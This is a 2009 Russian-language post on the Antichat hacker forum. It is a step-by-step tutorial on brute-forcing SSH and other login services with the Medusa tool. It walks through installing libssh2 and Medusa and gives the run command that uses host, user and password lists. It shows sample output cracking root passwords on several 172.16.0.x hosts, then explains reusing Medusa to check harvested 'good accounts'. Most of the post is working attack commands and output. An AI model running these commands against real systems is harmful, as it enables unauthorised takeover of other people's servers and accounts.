ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Чужие Статьи
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Medusa manual или брутфорс SSH!
  #1  
Старый 16.11.2009, 19:04
Аватар для Xcontrol212
Xcontrol212
Постоянный
Регистрация: 13.02.2008
Сообщений: 505
Провел на форуме:
2916750

Репутация: 277


Отправить сообщение для Xcontrol212 с помощью ICQ
По умолчанию Medusa manual или брутфорс SSH!

Частенько проскакивают сообщения о том как брутить ssh , а так же и других демонов .На счет брута SSH все в упор кричат hydra , он самый лучший и самый самый, но это не так .После двух часов брута на нескольких потоков он у меня нагло падал в кору , помогало только перезапуск и если смотреть на скорость то показывал не особо хорошие результаты .Но есть и другой брут medusa , так же поддерживает огромное количество модулей к различным сервисам.
Вот список того что он поддерживает:
Код:
AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare), NNTP, PcAnywhere, POP3, PostgreSQL, rexec, rlogin, rsh, SMB, SMTP (AUTH/VRFY), SNMP, SSHv2, SVN, Telnet, VmAuthd, VNC
Плюс к тому же еще и RDP в связке с rdesktop.
Скачать последнию версию можно с сайта разработчиков www.foofus.net. Для брута SSH потребуется таже библиотека что и для hydra - libssh2.

Качаем и ставим в начале библиотеку
Код:
wget http://downloads.sourceforge.net/project/libssh2/libssh2/1.1/libssh2-1.1.tar.gz?use_mirror=sunet
И ставим ее
Код:
tar -zxvf libssh2-1.1.tar.gz
cd libssh2-1.1
./configure && make && make install
Качаем медузу
Код:
wget http://www.foofus.net/jmk/tools/medusa-1.5.tar.gz
tar -zxvf medusa-1.5.tar.gz
cd medusa-1.5
./configure
Если библиотека встала нормально то после конфигурации

PHP код:
configure:     Medusa Module Build Summary
configure
:
configure:     AFP             ** Disabled **
configure:     CVS             Enabled
configure
:     FTP             Enabled
configure
:     HTTP            Enabled
configure
:     IMAP            Enabled
configure
:     MSSQL           Enabled
configure
:     MYSQL           Enabled
configure
:     NCP             ** Disabled **
configure:     NNTP            Enabled
configure
:     PCANYWHERE      Enabled
configure
:     POP3            Enabled
configure
:     POSTGRES        ** Disabled **
configure:     REXEC           Enabled
configure
:     RLOGIN          Enabled
configure
:     RSH             Enabled
configure
:     SMBNT           Enabled
configure
:     SMTP            Enabled
configure
:     SMTP-VRFY       Enabled
configure
:     SNMP            Enabled
configure
:     SSH             Enabled
configure
:     SVN             ** Disabled **
configure:     TELNET          Enabled
configure
:     VMAUTHD         Enabled
configure
:     VNC             Enabled
configure
:     WRAPPER         Enabled
configure
:     WEB-FORM        Enabled 
SSH будет открыт , сразу компилим и ставим .
Код:
make && make install
И смотрим как встали модуль для медусы
Код:
medusa -d

 + cvs.mod : Brute force module for CVS sessions : version 1.0.0
 + ftp.mod : Brute force module for FTP/FTPS sessions : version 1.3.0
 + http.mod : Brute force module for HTTP : version 1.3.0
 + imap.mod : Brute force module for IMAP sessions : version 1.2.0
 + mssql.mod : Brute force module for M$-SQL sessions : version 1.1.1
 + mysql.mod : Brute force module for MySQL sessions : version 1.2
 + nntp.mod : Brute force module for NNTP sessions : version 1.0.0
 + pcanywhere.mod : Brute force module for PcAnywhere sessions : version 1.0.2
 + pop3.mod : Brute force module for POP3 sessions : version 1.2
 + rexec.mod : Brute force module for REXEC sessions : version 1.1.1
 + rlogin.mod : Brute force module for RLOGIN sessions : version 1.0.2
 + rsh.mod : Brute force module for RSH sessions : version 1.0.1
 + smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 1.5
 + smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 1.0.0
 + smtp.mod : Brute force module for SMTP Authentication with TLS : version 1.0.0
 + snmp.mod : Brute force module for SNMP Community Strings : version 1.0.0
 + ssh.mod : Brute force module for SSH v2 sessions : version 1.0.2
 + telnet.mod : Brute force module for telnet sessions : version 1.2.2
 + vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 1.0.1
 + vnc.mod : Brute force module for VNC sessions : version 1.0.1
 + web-form.mod : Brute force module for web forms : version 1.0.0
 + wrapper.mod : Generic Wrapper Module : version 1.0.1
Запускаем с 3 потоками

Код:
medusa -T 3 -H hosts.txt -U users.txt -P password.txt -O good.txt -M ssh
PHP код:
ACCOUNT CHECK: [sshHost172.16.0.16 (3 of 61 completeUserroot (1 of 11 completePasswordadmin (1 of 5 complete)
ACCOUNT CHECK: [sshHost172.16.0.92 (1 of 61 completeUserroot (1 of 11 completePasswordadmin (1 of 5 complete)
ACCOUNT CHECK: [sshHost172.16.0.92 (1 of 61 completeUserroot (1 of 11 completePasswordsuperpass (2 of 5 complete)
ACCOUNT FOUND: [sshHost172.16.0.92 Userroot Passwordsuperpass [SUCCESS]
ACCOUNT CHECK: [sshHost172.16.0.3 (2 of 62 completeUserroot (1 of 11 completePasswordadmin (1 of 5 complete)
ACCOUNT CHECK: [sshHost172.16.0.3 (2 of 62 completeUserroot (1 of 11 completePasswordsuperpass (2 of 5 complete)
ACCOUNT FOUND: [sshHost172.16.0.3 Userroot Password:  superpass[SUCCESS]
CRITICALFailed to resolve hostname172.16.0.8172.16.0.92
ACCOUNT CHECK
: [sshHost172.16.0.16 (3 of 64 completeUserroot (1 of 11 completePasswordsuperpass (2 of 5 complete)
ACCOUNT CHECK: [sshHost172.16.0.16 (3 of 64 completeUserroot (1 of 11 completePasswordwew33w@ (3 of 5 complete)
ACCOUNT CHECK: [sshHost172.16.0.8 (6 of 64 completeUserroot (1 of 11 completePasswordadmin (1 of 5 complete)
ACCOUNT CHECK: [sshHost172.16.0.8 (6 of 64 completeUserroot (1 of 11 completePasswordsuperpass (2 of 5 complete)
ACCOUNT FOUND: [sshHost172.16.0.8 Userroot Password:  superpass[SUCCESS]
ACCOUNT CHECK: [sshHost172.16.0.16 (3 of 65 completeUserroot (1 of 11 completePasswordsupport (4 of 5 complete)
ACCOUNT CHECK: [sshHost172.16.0.18 (4 of 65 completeUserroot (1 of 11 completePasswordadmin (1 of 5 complete)
ACCOUNT CHECK: [sshHost172.16.0.18 (4 of 65 completeUserroot (1 of 11 completePasswordsuperpass (2 of 5 complete)
ACCOUNT FOUND: [sshHost172.16.0.18 Userroot Passwordsuperpass [SUCCESS]
ACCOUNT CHECK: [sshHost172.16.0.16 (3 of 66 completeUserroot (1 of 11 completePasswordmail (5 of 5 complete
И смотри в лог фаил

Код:
cat good.txt
PHP код:
[root@localhost brr]# cat good
# Medusa v.1.5 (2009-07-24 19:56:33)
# /usr/local/bin/medusa -T 3 -H hosts -U users -P password -O good -M ssh
ACCOUNT FOUND: [sshHost172.16.0.92 Userroot Passwordsuperpass [SUCCESS]
ACCOUNT FOUND: [sshHost172.16.0.3 Userroot Password:  superpass[SUCCESS]
ACCOUNT FOUND: [sshHost172.16.0.8 Userroot Password:  superpass[SUCCESS]
ACCOUNT FOUND: [sshHost172.16.0.18 Userroot Password:  superpass [SUCCESS]
# Medusa has finished (2009-07-24 19:56:42). 
На бруте SSH он не останавливается , им так же можно брутить и фтп и рдп ( имхо не особо порадовало , очень много пропусков из за того что патч для rdesktop не поддерживает ответы системы на языках отличных от инглиша ).

Как оказалось , не обратил внимания , она еще и без проблем чекает акки , то-есть какие модули подключенны те и чекает , в том числе и фтп и ssh , мыло и т.д.Но фотмат записи другой .Содаем файлик с содержимым

Код:
172.16.0.3:root:superpass
Формат файла может быть и таким
Код:
host:username:password 
host:username: 
host:: 
:username:password 
:username: 
::password 
host::password
И запускаем medusa в качестве чекера

Код:
medusa -M ssh -C hosts
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [ssh] Host: 172.16.0.3 (1 of 1, 1 complete) User: root (1 of 1, 1 complete) Password: superpass (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 172.16.0.3 User: root Password: superpass [SUCCESS]
Точно так же будет и чекать остальные акки , указав еще и лог для сохранения , все гуд акки будут складываться туда.

(С)n0klos
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взлом E-Mail и анкет Vkontakte.ru на заказ Frost26 О Работе 25 19.11.2009 22:00
Хакер и закон! SladerNon Болталка 17 12.11.2009 09:42
Брутфорс medusa earcher Безопасность 0 25.04.2009 07:35
Хакеры и кракеры или "Что такое хорошо и что такое плохо?" foreva Чужие Статьи 12 09.02.2008 12:26
Обнаружение Sql инъекций и Css атак k00p3r Чужие Статьи 0 12.06.2005 20:43



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ